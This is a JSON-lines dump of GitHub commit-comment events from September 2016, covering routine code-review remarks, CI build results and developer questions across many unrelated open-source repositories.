{"id":"4602304319","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129826,"position":null,"line":null,"path":null,"commit_id":"77ecbfe6d1b4d427f346cb9e65b0133634d8df40","created_at":"2016-09-22T13:05:10Z","updated_at":"2016-09-22T13:05:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1118](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13945&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:10:29"}},"created_at":"2016-09-22T13:05:10Z"}
{"id":"4602306592","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"abtinf/abtinf.github.io"},"payload":{"comment":{"id":19129831,"position":null,"line":null,"path":null,"commit_id":"7ff1fc7b977594b84fd9cc8d8f586058ba5333c3","created_at":"2016-09-22T13:05:35Z","updated_at":"2016-09-22T13:05:35Z","body":"Some places, like restuarant, need to have normal social rules for behavior changes. Behaviors should obey places' rules."}},"created_at":"2016-09-22T13:05:35Z"}
{"id":"4602309788","type":"CommitCommentEvent","actor":{"login":"skomis-mm"},"repo":{"name":"skomis-mm/serilog-sinks-periodicbatching"},"payload":{"comment":{"id":19129838,"position":null,"line":null,"path":null,"commit_id":"b4c60d63d3fe0889e4a973ed40ca8c4f4729024e","created_at":"2016-09-22T13:06:12Z","updated_at":"2016-09-22T13:06:12Z","body":"@operezfuentes Hi, Oscar. Still working on polishing perf tests to be more accurate on results. You can see them [here](https://github.com/skomis-mm/serilog-sinks-periodicbatching/tree/concurrentqueue/test/Serilog.Sinks.PeriodicBatching.PerformanceTests). I beleive I need one more evening for this :). Anyway, any suggestions appreciated, thanks!"}},"created_at":"2016-09-22T13:06:12Z"}
{"id":"4602313448","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19129846,"position":8,"line":52,"path":"src/ConnectionGraphicsObject.cpp","commit_id":"d0f968ca15f21a7b82a708c114c15e85ecec7e6a","created_at":"2016-09-22T13:06:53Z","updated_at":"2016-09-22T13:06:53Z","body":"- You can squash your changes into one commit (let me know if you need help with git)\r\n- Fix code formatting (indentation: 2 spaces, curly opening braces on the new line) -- I am sure it is doable automatically in VS.\r\n- Make a [good commit message](http://chris.beams.io/posts/git-commit) in the imperative form \"Fix such a problem\", \"Rework this function\" or \"Modify painting\" etc.  \r\n- Make a pool request\r\n\r\nI am trying to follow more or less strict rules in order to have the consistent code quality.\r\nThen it becomes a habit and the code looks clean and shiny ;)"}},"created_at":"2016-09-22T13:06:53Z"}
{"id":"4602315119","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129852,"position":null,"line":null,"path":null,"commit_id":"628b1257c6600f4d580c388643faf4634da87b26","created_at":"2016-09-22T13:07:13Z","updated_at":"2016-09-22T13:07:13Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1119](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13949&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T13:07:13Z"}
{"id":"4602316571","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"abtinf/abtinf.github.io"},"payload":{"comment":{"id":19129860,"position":null,"line":null,"path":null,"commit_id":"7ff1fc7b977594b84fd9cc8d8f586058ba5333c3","created_at":"2016-09-22T13:07:30Z","updated_at":"2016-09-22T13:07:30Z","body":"Some noises, etc often make community not that peace."}},"created_at":"2016-09-22T13:07:30Z"}
{"id":"4602317868","type":"CommitCommentEvent","actor":{"login":"MsHax085"},"repo":{"name":"RamboFisk/mcSoftware-DAT255"},"payload":{"comment":{"id":19129864,"position":null,"line":null,"path":null,"commit_id":"ea538cd02a3a8a0c65cccb9b1b4d4e426ff33b17","created_at":"2016-09-22T13:07:45Z","updated_at":"2016-09-22T13:07:45Z","body":"This commit also include \"As a user i want to be able to see and navigate a map.\"\r\n- Set up the Google map API.\r\n- Add Google Maps to interface"}},"created_at":"2016-09-22T13:07:45Z"}
{"id":"4602318652","type":"CommitCommentEvent","actor":{"login":"galaa1223"},"repo":{"name":"galaa1223/tt"},"payload":{"comment":{"id":19129866,"position":null,"line":null,"path":null,"commit_id":"42ecba2d9e1bcf4eb931634ca0123f7d52c94ddd","created_at":"2016-09-22T13:07:55Z","updated_at":"2016-09-22T13:07:55Z","body":"sdfsfasfsfssdfsdf"}},"created_at":"2016-09-22T13:07:55Z"}
{"id":"4602323050","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"nop33/indico"},"payload":{"comment":{"id":19129873,"position":15,"line":67,"path":"indico/modules/events/registration/templates/management/regform_list.html","commit_id":"9a44f4d87c9bce3828a7c421fd8c80ab0c47422e","created_at":"2016-09-22T13:08:32Z","updated_at":"2016-09-22T13:08:32Z","body":"lowercase `remove`? also, `to manage registrations`"}},"created_at":"2016-09-22T13:08:32Z"}
{"id":"4602323613","type":"CommitCommentEvent","actor":{"login":"lgrahl"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19129875,"position":null,"line":null,"path":null,"commit_id":"8ece624dfa81aa87847e0ee9ebcac331bcd5a9d5","created_at":"2016-09-22T13:08:39Z","updated_at":"2016-09-22T13:08:39Z","body":"I think we should guarantee delivery of all messages. We don't know what tasks may require. Your example should only ever happen in case one of the clients doesn't linger properly."}},"created_at":"2016-09-22T13:08:39Z"}
{"id":"4602324347","type":"CommitCommentEvent","actor":{"login":"Turbovix"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19129877,"position":null,"line":null,"path":null,"commit_id":"8ed94697f46788d56d71551940b2f4f4778bb9de","created_at":"2016-09-22T13:08:47Z","updated_at":"2016-09-22T13:08:47Z","body":"@tananaev just not commenting. the code below, enables the function module to control 2 output module, in which case it is usually used for the alarm.\r\n>\r\nCommand.TYPE_ALARM_ARM,\r\nCommand.TYPE_ALARM_DISARM,\r\n>"}},"created_at":"2016-09-22T13:08:47Z"}
{"id":"4602324425","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"nop33/indico"},"payload":{"comment":{"id":19129878,"position":48,"line":89,"path":"indico/modules/events/registration/templates/management/regform_list.html","commit_id":"9a44f4d87c9bce3828a7c421fd8c80ab0c47422e","created_at":"2016-09-22T13:08:48Z","updated_at":"2016-09-22T13:08:48Z","body":"Customize?"}},"created_at":"2016-09-22T13:08:48Z"}
{"id":"4602326293","type":"CommitCommentEvent","actor":{"login":"larsblumberg"},"repo":{"name":"getsenic/nuimo-android"},"payload":{"comment":{"id":19129884,"position":24,"line":99,"path":"nuimo/src/main/kotlin/com/senic/nuimo/NuimoBluetoothController.kt","commit_id":"9d5836e034504ade0ef3f27bb19ec45ee895f215","created_at":"2016-09-22T13:09:11Z","updated_at":"2016-09-22T13:09:11Z","body":"you can clean URL to https://code.google.com/p/android/issues/detail?id=223104"}},"created_at":"2016-09-22T13:09:11Z"}
{"id":"4602327344","type":"CommitCommentEvent","actor":{"login":"arianelperalta"},"repo":{"name":"PeraltaLab/IL_Wetlands"},"payload":{"comment":{"id":19129888,"position":null,"line":null,"path":null,"commit_id":"f07c120c7dd71e7de0c484dfc4c5e417baf41c87","created_at":"2016-09-22T13:09:24Z","updated_at":"2016-09-22T13:09:24Z","body":"Merging last round of edits."}},"created_at":"2016-09-22T13:09:24Z"}
{"id":"4602327622","type":"CommitCommentEvent","actor":{"login":"jscaber"},"repo":{"name":"CGATOxford/CGATPipelines"},"payload":{"comment":{"id":19129889,"position":null,"line":null,"path":null,"commit_id":"7b47e2950a9b049787efb0ac5b1e041fc5234ade","created_at":"2016-09-22T13:09:28Z","updated_at":"2016-09-22T13:09:28Z","body":"Dear @AndreasHeger,\r\nI encountered these missing imports during my pipeline work.\r\nHave these genuinely been omitted, or is something wrong with my configuration?\r\nIf missing I will generate pull request.\r\nBest wishes,\r\nJakub\r\n\r\n"}},"created_at":"2016-09-22T13:09:28Z"}
{"id":"4602329844","type":"CommitCommentEvent","actor":{"login":"nop33"},"repo":{"name":"nop33/indico"},"payload":{"comment":{"id":19129896,"position":15,"line":67,"path":"indico/modules/events/registration/templates/management/regform_list.html","commit_id":"9a44f4d87c9bce3828a7c421fd8c80ab0c47422e","created_at":"2016-09-22T13:09:54Z","updated_at":"2016-09-22T13:09:54Z","body":"well, I just copied it form the dialog subtitle. I'll have to change it there as well."}},"created_at":"2016-09-22T13:09:54Z"}
{"id":"4602331534","type":"CommitCommentEvent","actor":{"login":"xlab"},"repo":{"name":"deepakjois/harfbuzz-go"},"payload":{"comment":{"id":19129900,"position":null,"line":null,"path":null,"commit_id":"aef981c668290801ca0f51e817089c2a771d5799","created_at":"2016-09-22T13:10:13Z","updated_at":"2016-09-22T13:10:13Z","body":"Something like that to continue\r\n\r\n```yaml\r\nTRANSLATOR: \r\n  ConstRules: \r\n    defines: expand\r\n  Rules: \r\n    global: \r\n      - {transform: lower}\r\n      - {action: accept, from: \"^hb_\"}\r\n      - {action: replace, from: \"^hb_\", to: _}\r\n      - {transform: export}\r\n    const:\r\n      - {action: accept, from: \"^HB_\"}\r\n      - {action: replace, from: \"^hb_\", to: _}\r\n    type: \r\n      - {action: replace, from: \"_t$\"}\r\n    private:\r\n      - {transform: unexport}\r\n    post-global: \r\n      - {action: replace, from: _$}\r\n      - {load: snakecase}\r\n```\r\n"}},"created_at":"2016-09-22T13:10:13Z"}
{"id":"4602334769","type":"CommitCommentEvent","actor":{"login":"EnzzoCaaue"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19129907,"position":null,"line":null,"path":null,"commit_id":"3377f3e3a1ce7f965b6a9e1322c2fc385b7dcc70","created_at":"2016-09-22T13:10:50Z","updated_at":"2016-09-22T13:10:50Z","body":"You are awesome!!!"}},"created_at":"2016-09-22T13:10:50Z"}
{"id":"4602337929","type":"CommitCommentEvent","actor":{"login":"psyborg55"},"repo":{"name":"xdarklight/mktplinkfw3"},"payload":{"comment":{"id":19129910,"position":null,"line":null,"path":null,"commit_id":"be60f7470c133db2953653924e1e1cba1f0c0ced","created_at":"2016-09-22T13:11:28Z","updated_at":"2016-09-22T13:11:28Z","body":"can you explain where did you get the boot salt from since it differs from the one in mktplinkfw2? and this salt should affect fw upgrades only without u-boot or not?\r\n\r\nalso, a script could not extract the signatures..\r\n\r\n>     --- ./images/TD-W8970v1_0.6.0_2.12_no_boot(140613)_2014-06-13_09.17.23.bin ---\r\n    Error opening Public Key tp-link_pubkey.bin.ms_publickeyblob\r\n    27247:error:02001002:system library:fopen:No such file or directory:bss_file.c:356:fopen('tp-link_pubkey.bin.ms_publickeyblob','r')\r\n    27247:error:20074002:BIO routines:FILE_CTRL:system lib:bss_file.c:358:\r\n    unable to load Public Key\r\n    --- ./images/TD-W8970v1_0.6.0_2.12_up_boot(140613)_2014-06-13_09.17.23.bin ---\r\n    Error opening Public Key tp-link_pubkey.bin.ms_publickeyblob\r\n    27253:error:02001002:system library:fopen:No such file or directory:bss_file.c:356:fopen('tp-link_pubkey.bin.ms_publickeyblob','r')\r\n    27253:error:20074002:BIO routines:FILE_CTRL:system lib:bss_file.c:358:\r\n    unable to load Public Key\r\n    --- ./images/mr13uv1_boot.bin ---\r\n    Error opening Public Key tp-link_pubkey.bin.ms_publickeyblob\r\n    27259:error:02001002:system library:fopen:No such file or directory:bss_file.c:356:fopen('tp-link_pubkey.bin.ms_publickeyblob','r')\r\n    27259:error:20074002:BIO routines:FILE_CTRL:system lib:bss_file.c:358:\r\n    unable to load Public Key\r\n    --- ./images/mr22uv1_boot.bin ---\r\n    Error opening Public Key tp-link_pubkey.bin.ms_publickeyblob\r\n    27265:error:02001002:system library:fopen:No such file or directory:bss_file.c:356:fopen('tp-link_pubkey.bin.ms_publickeyblob','r')\r\n    27265:error:20074002:BIO routines:FILE_CTRL:system lib:bss_file.c:358:\r\n    unable to load Public Key\r\n    --- ./images/wdr3320v2_boot.bin ---\r\n    Error opening Public Key tp-link_pubkey.bin.ms_publickeyblob\r\n    27271:error:02001002:system library:fopen:No such file or directory:bss_file.c:356:fopen('tp-link_pubkey.bin.ms_publickeyblob','r')\r\n    27271:error:20074002:BIO routines:FILE_CTRL:system lib:bss_file.c:358:\r\n    unable to load Public Key\r\n"}},"created_at":"2016-09-22T13:11:28Z"}
{"id":"4602338196","type":"CommitCommentEvent","actor":{"login":"fer"},"repo":{"name":"meicj/ion-tree-list"},"payload":{"comment":{"id":19129911,"position":null,"line":null,"path":null,"commit_id":"848750efb74434453691ea3b1237b765d437f7a3","created_at":"2016-09-22T13:11:31Z","updated_at":"2016-09-22T13:11:31Z","body":"There's a gulp task to update dependencies. Please refer to latest versions of the library. HTH!"}},"created_at":"2016-09-22T13:11:31Z"}
{"id":"4602342620","type":"CommitCommentEvent","actor":{"login":"uboznikov"},"repo":{"name":"GluuFederation/oxTrust"},"payload":{"comment":{"id":19129925,"position":null,"line":null,"path":null,"commit_id":"1b7fcc3a8b7ddf038f6303ef074b6c76e36e270e","created_at":"2016-09-22T13:12:21Z","updated_at":"2016-09-22T13:12:21Z","body":"I think there's already a ticket on that but I don't know its exact whereabouts."}},"created_at":"2016-09-22T13:12:21Z"}
{"id":"4602344155","type":"CommitCommentEvent","actor":{"login":"rebroad"},"repo":{"name":"BitcoinUnlimited/BitcoinUnlimited"},"payload":{"comment":{"id":19129928,"position":37,"line":1420,"path":"src/net.cpp","commit_id":"8e819ce97498d97b54824bc306c93e74402c0d79","created_at":"2016-09-22T13:12:40Z","updated_at":"2016-09-22T13:12:40Z","body":"My C++ skills are failing me! Why doesn't this line compile on Bitcoin Core...?"}},"created_at":"2016-09-22T13:12:40Z"}
{"id":"4602344248","type":"CommitCommentEvent","actor":{"login":"lgrahl"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19129929,"position":null,"line":null,"path":null,"commit_id":"312878823300d84e5279dc9a46e16c58c12c77d8","created_at":"2016-09-22T13:12:41Z","updated_at":"2016-09-22T13:12:41Z","body":"Yeah, 60 seconds might be too much. What does the initiator expect, though? One of them eventually has to send something or nothing is going to happen. When the initiator drops responders, at least there is a chance that one of the new ones behaves properly."}},"created_at":"2016-09-22T13:12:41Z"}
{"id":"4602344904","type":"CommitCommentEvent","actor":{"login":"Turbovix"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19129931,"position":null,"line":null,"path":null,"commit_id":"2d595441ba2470fdec01564f25e4b6a11e5a76a6","created_at":"2016-09-22T13:12:48Z","updated_at":"2016-09-22T13:12:48Z","body":"@tananaev the code below, enables the function module to control 2 output module, in which case it is usually used for the alarm. In the original design there is no such possibility in writing Suntech protocol."}},"created_at":"2016-09-22T13:12:48Z"}
{"id":"4602345204","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"ProximoSrl/Jarvis.DocumentStore"},"payload":{"comment":{"id":19129932,"position":null,"line":null,"path":null,"commit_id":"043fc964683d089e37f3a5f50352eb6bd5bc792e","created_at":"2016-09-22T13:12:52Z","updated_at":"2016-09-22T13:12:52Z","body":"TeamCity Jarvis :: Jarvis.DocumentStore :: GitFlow Debug / Test / Release [Build 89](http://build.prxm.it:8811/viewLog.html?buildId=9530&buildTypeId=Jarvis_DocumentStore_GitVersion) is now running\n"}},"created_at":"2016-09-22T13:12:52Z"}
{"id":"4602350497","type":"CommitCommentEvent","actor":{"login":"200MPH"},"repo":{"name":"tcpdf-clone/tcpdf"},"payload":{"comment":{"id":19129944,"position":null,"line":null,"path":null,"commit_id":"2e2b596ae548e528d5b5b7d68269e66dfb85f6f5","created_at":"2016-09-22T13:13:54Z","updated_at":"2016-09-22T13:13:54Z","body":"Hi,\r\n\r\nI'm not sure if displaying leading 0 in UTC barcodes labels is right."}},"created_at":"2016-09-22T13:13:54Z"}
{"id":"4602351641","type":"CommitCommentEvent","actor":{"login":"ShirleyLeeLi"},"repo":{"name":"ShirleyLeeLi/hello-world"},"payload":{"comment":{"id":19129950,"position":2,"line":2,"path":"README.md","commit_id":"d8599014c4ad6bdcd503e0249932367a2cfe820d","created_at":"2016-09-22T13:14:07Z","updated_at":"2016-09-22T13:14:07Z","body":"I am practicing...."}},"created_at":"2016-09-22T13:14:07Z"}
{"id":"4602353860","type":"CommitCommentEvent","actor":{"login":"AlexxEG"},"repo":{"name":"AlexxEG/YouTube-Downloader"},"payload":{"comment":{"id":19129953,"position":null,"line":null,"path":null,"commit_id":"093e509827b7dfd26f3c747eab4fe3eac639d307","created_at":"2016-09-22T13:14:32Z","updated_at":"2016-09-22T13:14:32Z","body":"Closes #1 #3 "}},"created_at":"2016-09-22T13:14:32Z"}
{"id":"4602355882","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129958,"position":null,"line":null,"path":null,"commit_id":"628b1257c6600f4d580c388643faf4634da87b26","created_at":"2016-09-22T13:14:53Z","updated_at":"2016-09-22T13:14:53Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1119](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13949&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 220, ignored: 3 Build time: 00:07:40\n### Failed tests\n```\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.rest of installation queue (consecutive installPos) remains Pending upon one package failing to install: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET to download a file returns 3xx if the package URL is an s3 URI: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T13:14:53Z"}
{"id":"4602357056","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"the7winds/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19129960,"position":22,"line":64,"path":"tasks/linked_lists/module.c","commit_id":"c11426e693f7649654dd1149c376e9538320f03b","created_at":"2016-09-22T13:15:07Z","updated_at":"2016-09-22T13:15:07Z","body":"NULL check"}},"created_at":"2016-09-22T13:15:07Z"}
{"id":"4602357893","type":"CommitCommentEvent","actor":{"login":"mehdi-kaytoue"},"repo":{"name":"mehdi-kaytoue/contextual-exceptional-subgraph-mining"},"payload":{"comment":{"id":19129963,"position":null,"line":null,"path":null,"commit_id":"77c6955a5469aa68f142413d653f34612cffb488","created_at":"2016-09-22T13:15:16Z","updated_at":"2016-09-22T13:15:16Z","body":"?"}},"created_at":"2016-09-22T13:15:16Z"}
{"id":"4602360121","type":"CommitCommentEvent","actor":{"login":"AlexxEG"},"repo":{"name":"AlexxEG/YouTube-Downloader"},"payload":{"comment":{"id":19129971,"position":null,"line":null,"path":null,"commit_id":"093e509827b7dfd26f3c747eab4fe3eac639d307","created_at":"2016-09-22T13:15:43Z","updated_at":"2016-09-22T13:15:43Z","body":"Closes #1 and closes #3 "}},"created_at":"2016-09-22T13:15:43Z"}
{"id":"4602361450","type":"CommitCommentEvent","actor":{"login":"fernandog"},"repo":{"name":"fernandog/SickRage"},"payload":{"comment":{"id":19129973,"position":null,"line":null,"path":null,"commit_id":"1acc74a24058643d09ebe7bcd1a2b22264339cf9","created_at":"2016-09-22T13:15:59Z","updated_at":"2016-09-22T13:15:59Z","body":"@omgImAlexis about `manual subtitle search` feature, can we populate the `modal`using JS with JSON data that comes from handler?\r\n\r\nBecause we can't populate mako using the `render`. User may pick different episode to manual search for subs and will be a hassle to refresh page every time\r\n\r\n@ratoaq2"}},"created_at":"2016-09-22T13:15:59Z"}
{"id":"4602361865","type":"CommitCommentEvent","actor":{"login":"AlexxEG"},"repo":{"name":"AlexxEG/YouTube-Downloader"},"payload":{"comment":{"id":19129976,"position":null,"line":null,"path":null,"commit_id":"093e509827b7dfd26f3c747eab4fe3eac639d307","created_at":"2016-09-22T13:16:03Z","updated_at":"2016-09-22T13:16:03Z","body":"Closes #3 "}},"created_at":"2016-09-22T13:16:03Z"}
{"id":"4602363677","type":"CommitCommentEvent","actor":{"login":"fernandog"},"repo":{"name":"fernandog/SickRage"},"payload":{"comment":{"id":19129978,"position":null,"line":null,"path":null,"commit_id":"1acc74a24058643d09ebe7bcd1a2b22264339cf9","created_at":"2016-09-22T13:16:24Z","updated_at":"2016-09-22T13:16:24Z","body":"![manual_subs_poc4](https://cloud.githubusercontent.com/assets/2620870/18749519/9b6ceef2-80ad-11e6-939a-6596cd3e01f3.png)\r\n"}},"created_at":"2016-09-22T13:16:24Z"}
{"id":"4602366267","type":"CommitCommentEvent","actor":{"login":"rockdaboot"},"repo":{"name":"rockdaboot/libpsl"},"payload":{"comment":{"id":19129981,"position":11,"line":531,"path":"src/psl.c","commit_id":"9e1ca81be4b1d658ac5a7a5f312d5ada3a9ba6b0","created_at":"2016-09-22T13:16:49Z","updated_at":"2016-09-22T13:16:49Z","body":"To avoid signed/unsigned warnings in a short way. Correct would be a cast to (const unsigned char *). Since it is just for silencing the compiler, I don't mind. If you insist, I'll change it ;-)"}},"created_at":"2016-09-22T13:16:49Z"}
{"id":"4602366565","type":"CommitCommentEvent","actor":{"login":"MarcusTwist"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19129982,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-22T13:16:53Z","updated_at":"2016-09-22T13:16:53Z","body":"Don't matter have compiled it now :)"}},"created_at":"2016-09-22T13:16:53Z"}
{"id":"4602368463","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"the7winds/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19129987,"position":14,"line":11,"path":"tasks/linked_lists/stack.c","commit_id":"c11426e693f7649654dd1149c376e9538320f03b","created_at":"2016-09-22T13:17:14Z","updated_at":"2016-09-22T13:17:14Z","body":"INIT_LIST_HEAD is needed for entry->lh"}},"created_at":"2016-09-22T13:17:14Z"}
{"id":"4602370276","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/lodex"},"payload":{"comment":{"id":19129991,"position":null,"line":null,"path":null,"commit_id":"820b9c33a91382c2d37a4bd04dea3ee7df6dce99","created_at":"2016-09-22T13:17:34Z","updated_at":"2016-09-22T13:17:34Z","body":"Ça ressemble plus à une suppression qu'à un renommage..."}},"created_at":"2016-09-22T13:17:34Z"}
{"id":"4602372263","type":"CommitCommentEvent","actor":{"login":"chrisgahlert"},"repo":{"name":"vaadin/vaadin"},"payload":{"comment":{"id":19129995,"position":35,"line":75,"path":"server/src/main/java/com/vaadin/server/widgetsetutils/WidgetSetBuilder.java","commit_id":"4bc375d1d21f468e6433da3a183150e0bfe0cae4","created_at":"2016-09-22T13:17:56Z","updated_at":"2016-09-22T13:17:56Z","body":"This change produces an IllegalArgumentException:\r\n```\r\n     [java] Widgetsets found from classpath:\r\n     [java] \tcom.example.VaadinApplicationWidgetset in file://C/workspace/src/main/java\r\n     [java] Addon styles found from classpath:\r\n     [java] Search took 178ms\r\n     [java] Exception in thread \"main\" java.lang.IllegalArgumentException: URI has an authority component\r\n     [java] \tat java.io.File.<init>(File.java:423)\r\n     [java] \tat com.vaadin.server.widgetsetutils.WidgetSetBuilder.updateWidgetSet(WidgetSetBuilder.java:74)\r\n     [java] \tat com.vaadin.server.widgetsetutils.WidgetSetBuilder.main(WidgetSetBuilder.java:54)\r\n``` "}},"created_at":"2016-09-22T13:17:56Z"}
{"id":"4602379850","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"the7winds/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19130013,"position":40,"line":29,"path":"tasks/linked_lists/stack.c","commit_id":"c11426e693f7649654dd1149c376e9538320f03b","created_at":"2016-09-22T13:19:18Z","updated_at":"2016-09-22T13:19:18Z","body":"Use list_entry macro to get pointer to struct that contains list_head"}},"created_at":"2016-09-22T13:19:18Z"}
{"id":"4602389891","type":"CommitCommentEvent","actor":{"login":"bapt"},"repo":{"name":"freebsd/pkg"},"payload":{"comment":{"id":19130028,"position":5,"line":15,"path":"tests/frontend/rootdir.sh","commit_id":"45dd6736782422dd51fb546e49fd7c77311698df","created_at":"2016-09-22T13:21:03Z","updated_at":"2016-09-22T13:21:03Z","body":"this will break linux which does not have the realpath binaries"}},"created_at":"2016-09-22T13:21:03Z"}
{"id":"4602391112","type":"CommitCommentEvent","actor":{"login":"Greg8978"},"repo":{"name":"Greg8978/toaster"},"payload":{"comment":{"id":19130033,"position":null,"line":null,"path":null,"commit_id":"b46bf405ba7d239d82e9f8ddd8e108340d9ba8c2","created_at":"2016-09-22T13:21:15Z","updated_at":"2016-09-22T13:21:15Z","body":"That's very good and fast work!\r\nThank you!"}},"created_at":"2016-09-22T13:21:15Z"}
{"id":"4602395879","type":"CommitCommentEvent","actor":{"login":"tluck"},"repo":{"name":"tluck/OS-X-Voodoo-PS2-Controller"},"payload":{"comment":{"id":19130043,"position":null,"line":null,"path":null,"commit_id":"875bfe166d0d2a7576384dd5809289fdc3b28587","created_at":"2016-09-22T13:22:06Z","updated_at":"2016-09-22T13:22:06Z","body":"This adds some properties to the PS2K device for VoodooPSController to know what type of system. This key is used in the kext Info.plist files that will match. "}},"created_at":"2016-09-22T13:22:06Z"}
{"id":"4602396258","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19130045,"position":null,"line":null,"path":null,"commit_id":"628b1257c6600f4d580c388643faf4634da87b26","created_at":"2016-09-22T13:22:11Z","updated_at":"2016-09-22T13:22:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1120](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13953&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T13:22:11Z"}
{"id":"4602396534","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19130047,"position":8,"line":820,"path":"cura/CuraApplication.py","commit_id":"4e3384e6406bd3eecf082e594080bd86d68b8234","created_at":"2016-09-22T13:22:13Z","updated_at":"2016-09-22T13:22:13Z","body":"```if object_centers and len(object_centers) > 0``` ?\r\nLet me fix that for you: https://github.com/Ultimaker/Cura/commit/10af3ee5ab7231bfd29df4b73eb163fad3d9e566"}},"created_at":"2016-09-22T13:22:13Z"}
{"id":"4602401842","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"ProximoSrl/Jarvis.DocumentStore"},"payload":{"comment":{"id":19130066,"position":null,"line":null,"path":null,"commit_id":"043fc964683d089e37f3a5f50352eb6bd5bc792e","created_at":"2016-09-22T13:23:10Z","updated_at":"2016-09-22T13:23:10Z","body":"TeamCity Jarvis :: Jarvis.DocumentStore :: GitFlow Debug / Test / Release [Build 3.0.0-beta.1+4](http://build.prxm.it:8811/viewLog.html?buildId=9530&buildTypeId=Jarvis_DocumentStore_GitVersion) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 268 Build time: 00:10:04\n### Failed tests\n```\nGlobalSetupFixture: Jarvis.DocumentStore.Tests.SelfHostIntegratonTests.integration_out_of_process_tika_password(\"v3\").verify_tika_job_with_password: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T13:23:10Z"}
{"id":"4602405223","type":"CommitCommentEvent","actor":{"login":"johnse21"},"repo":{"name":"MobileComputingClass/FirstAndroidApp_Morning"},"payload":{"comment":{"id":19130077,"position":null,"line":null,"path":null,"commit_id":"b11d890edc9f4ae1d670895b112c82d3d3b7e964","created_at":"2016-09-22T13:23:45Z","updated_at":"2016-09-22T13:23:45Z","body":"thanks justine.. pero wala na yung class na yan.. bakit ganun LOL"}},"created_at":"2016-09-22T13:23:45Z"}
{"id":"4602409089","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130084,"position":null,"line":null,"path":null,"commit_id":"4306d887a6bc7f02e7626ddb859fde24eaf14c21","created_at":"2016-09-22T13:24:25Z","updated_at":"2016-09-22T13:24:25Z","body":"saw approval from JeetKunDoug\nat https://github.com/joedevivo/lager/commit/4306d887a6bc7f02e7626ddb859fde24eaf14c21"}},"created_at":"2016-09-22T13:24:25Z"}
{"id":"4602409117","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130085,"position":null,"line":null,"path":null,"commit_id":"4306d887a6bc7f02e7626ddb859fde24eaf14c21","created_at":"2016-09-22T13:24:25Z","updated_at":"2016-09-22T13:24:25Z","body":"merging joedevivo/lager/master = 4306d887 into borshop-integration-371-master"}},"created_at":"2016-09-22T13:24:25Z"}
{"id":"4602409151","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19130086,"position":null,"line":null,"path":null,"commit_id":"4306d887a6bc7f02e7626ddb859fde24eaf14c21","created_at":"2016-09-22T13:24:26Z","updated_at":"2016-09-22T13:24:26Z","body":"joedevivo/lager/master = 4306d887 merged ok, testing candidate = 1b20b7c3"}},"created_at":"2016-09-22T13:24:26Z"}
